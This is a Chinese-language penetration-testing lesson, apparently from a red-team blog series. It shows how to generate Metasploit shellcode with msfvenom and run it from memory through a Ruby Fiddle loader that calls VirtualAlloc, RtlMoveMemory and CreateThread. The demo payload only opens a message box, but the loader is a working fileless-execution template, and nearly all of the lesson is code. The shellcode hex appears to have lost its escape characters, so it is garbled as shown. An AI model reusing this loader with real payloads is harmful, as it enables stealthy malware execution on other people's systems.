第六十八课:基于Ruby内存加载shellcode第一季
专注APT攻击与防御
https://micropoor.blogspot.com/

本季是为配合msf在渗透过程中无文件渗透,提前做基础过度。也为msf插件编写做基础过
度。

ruby shellcode 生成如下:
1 msfvenom ‐p windows/messagebox TEXT=Micropoor TITLE=Micropoor ‐f ruby
‐‐smallest
2
附源码:

1 require 'fiddle'
2 require 'fiddle/import'
3 require 'fiddle/types'
4
5 # msfvenom ‐p windows/messagebox TEXT=Micropoor TITLE=Micropoor ‐f rub
y ‐‐smallest
6 shellcode =
7 "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" +
8 "x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" +
9 "x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" +
10 "x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" +
11 "x4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" +
12 "xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0d" +
13 "x01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01" +
14 "xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" +
15 "xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89" +
16 "xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" +
17 "x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" +
18 "xffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64" +
19 "x68x75x73x65x72x30xdbx88x5cx24x0ax89xe6x56" +
20 "xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24" +
21 "x52xe8x5fxffxffxffx68x72x58x20x20x68x6fx70" +
22 "x6fx6fx68x4dx69x63x72x31xdbx88x5cx24x09x89" +
23 "xe3x68x72x58x20x20x68x6fx70x6fx6fx68x4dx69" +
24 "x63x72x31xc9x88x4cx24x09x89xe1x31xd2x52x53" +
25 "x51x52xffxd0x31xc0x50xffx55x08"
26
27
28 include Fiddle
29
30 kernel32 = Fiddle.dlopen('kernel32')
31
32
33 ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, she
llcode.size, 0x3000, 0x40)
34
35
36 Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shell
code.size, 0, 0)
37
38
39 buf = Fiddle::Pointer[shellcode]
40
41
42 Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, s
hellcode.size)
43
44
45 thread = Function.new(kernel32['CreateThread'], [4,4,4,4,4,4],
4).call(0, 0, ptr, 0, 0, 0)
46
47
48 Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread,
‐1)

Micropoor